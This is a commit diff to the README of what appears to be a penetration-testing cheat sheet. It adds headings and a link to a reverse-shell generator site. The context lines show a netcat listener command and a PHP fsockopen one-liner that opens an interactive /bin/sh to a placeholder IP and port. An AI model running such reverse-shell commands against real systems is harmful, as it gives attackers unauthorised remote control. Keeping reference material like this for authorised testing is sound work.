Update README.md
This commit is contained in:
@@ -416,9 +416,10 @@ sudo nc –lnvp {PORT}
|
|||||||
|
|
||||||
# {PORT}: Select the port used to listen
|
# {PORT}: Select the port used to listen
|
||||||
```
|
```
|
||||||
|
|
||||||
<br />
|
<br />
|
||||||
|
|
||||||
|
# {IP ADDRESS}: IP Address of the client from step one (python server)
|
||||||
|
|
||||||
## NC Execute - Server [STEP 2]
|
## NC Execute - Server [STEP 2]
|
||||||
|
|
||||||
```bash
|
```bash
|
||||||
@@ -448,12 +449,16 @@ php -r ‘$sock=fsockopen(“{IP ADDRESS}”,{PORT});exec(“/bin/sh -i <&3 >&3
|
|||||||
# {IP ADDRESS}: IP Address of the client from step one (listener)
|
# {IP ADDRESS}: IP Address of the client from step one (listener)
|
||||||
# {PORT}: Port of the client from step one (listener)
|
# {PORT}: Port of the client from step one (listener)
|
||||||
```
|
```
|
||||||
|
<br />
|
||||||
|
|
||||||
|
## Reverse Shell Generator
|
||||||
|
|
||||||
|
<br />
|
||||||
|
|
||||||
[https://www.revshells.com/](https://www.revshells.com/)
|
[https://www.revshells.com/](https://www.revshells.com/)
|
||||||
|
|
||||||
|
|
||||||
|
<br />
|
||||||
|
|
||||||
# Shell Upgrade
|
# Shell Upgrade
|
||||||
|
|
||||||
|
|||||||
Reference in New Issue
Block a user